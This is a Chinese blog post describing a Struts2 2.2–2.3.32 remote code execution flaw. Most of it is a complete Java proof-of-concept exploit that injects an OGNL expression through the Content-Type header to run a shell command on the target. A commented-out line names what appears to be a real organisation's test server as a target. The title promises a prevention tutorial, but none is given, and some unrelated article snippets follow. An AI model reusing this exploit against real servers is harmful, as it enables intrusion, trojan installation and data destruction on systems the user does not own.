Struts2 2.2 和 2.3 版本最新漏洞及攻击方法和防范教程

原文链接:Struts2 2.2 和 2.3 版本最新漏洞

据最新消息,Struts2 2.2 到 2.3.32以下版本存在严重漏洞,攻击者可以通过此漏洞攻击任意使用了这两个版本的Struts2系统,并在目标机器执行任意脚本。

该漏洞目前在Windows和Linux下均可以攻击,注入成功,即可在客户机下进行任意命令,包含安装木马,拦截目标机器数据,删除数据等等。

现贴出测试代码:

1package com.blog.test; 2 3import java.io.BufferedReader; 4import java.io.InputStreamReader; 5import java.io.PrintWriter; 6import java.net.URL; 7import java.net.URLConnection; 8 9public class TestGongji { 10 11 12 static String url = "http://localhost:8080/Struts2Pro/"; 13 //static String url = "http://dwxt.test.chinaclear.cn/admin/login.action"; 14 15 public static void main(String[] args) { 16 17 String rlt2 = sendPost(url, "1"); 18 System.out.println(rlt2); 19 } 20 21 private static String sendPost(String urlStr, String param) { 22 String result = null; 23 try { 24 URL url = new URL(urlStr); 25 URLConnection conn = url.openConnection(); 26 conn.setRequestProperty("accept", "*/*"); 27 conn.setRequestProperty("connection", "Keep-Alive"); 28 //conn.setRequestProperty("cookie", "0000sPhRUJJTfYf9d3TiPf6HTXW:1agu86nml"); 29// conn.setRequestProperty("referer", "http://qqxt.test.chinaclear.cn/login.do"); 30 conn.setRequestProperty("Content-Type", "s-multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('cmd /c mkdir c:\\hello')};"); 31 conn.setDoOutput(true); 32 conn.setDoInput(true); 33 PrintWriter out = new PrintWriter(conn.getOutputStream()); 34 out.print(param); 35 out.flush(); 36 37 BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream())); 38 String line = null; 39 while ((line = in.readLine()) != null) { 40 result += line; 41 } 42 } catch (Exception e) { 43 e.printStackTrace(); 44 } 45 46 return result; 47 } 48}

在此代码中,我们尝试攻击了本地的 一个叫做Struts2Pro的视图struts2项目,同时使用命令在攻击的目标机器中的C:/盘下创建一个hello的文件夹,执行后发现成功创建该文件夹。

点赞
收藏

评论区

加载中...

相关推荐

MySQL:[Err] 1292 - Incorrect datetime value: ‘0000-00-00 00:00:00‘ for column ‘CREATE_TIME‘ at row 1

文章目录问题用navicat导入数据时,报错:原因这是因为当前的MySQL不支持datetime为0的情况。解决修改sql\mode:sql\mode:SQLMode定义了MySQL应支持的SQL语法、数据校验等,这样可以更容易地在不同的环境中使用MySQL。全局s

Oracle 分组与拼接字符串同时使用

SELECTT.,ROWNUMIDFROM(SELECTT.EMPLID,T.NAME,T.BU,T.REALDEPART,T.FORMATDATE,SUM(T.S0)S0,MAX(UPDATETIME)CREATETIME,LISTAGG(TOCHAR(

MySQL部分从库上面因为大量的临时表tmp_table造成慢查询

背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_

皕杰报表之UUID

​在我们用皕杰报表工具设计填报报表时,如何在新增行里自动增加id呢?能新增整数排序id吗?目前可以在新增行里自动增加id,但只能用uuid函数增加UUID编码,不能新增整数排序id。uuid函数说明:获取一个UUID,可以在填报表中用来创建数据ID语法:uuid()或uuid(sep)参数说明:sep布尔值,生成的uuid中是否包含分隔符'',缺省为

手写Java HashMap源码

HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程22

2020年前端实用代码段,为你的工作保驾护航

有空的时候,自己总结了几个代码段,在开发中也经常使用,谢谢。1、使用解构获取json数据let jsonData  id: 1,status: "OK",data: 'a', 'b';let  id, status, data: number   jsonData;console.log(id, status, number )

Struts2 2.2 和 2.3 版本最新漏洞及攻击方法和防范教程 - HelloWorld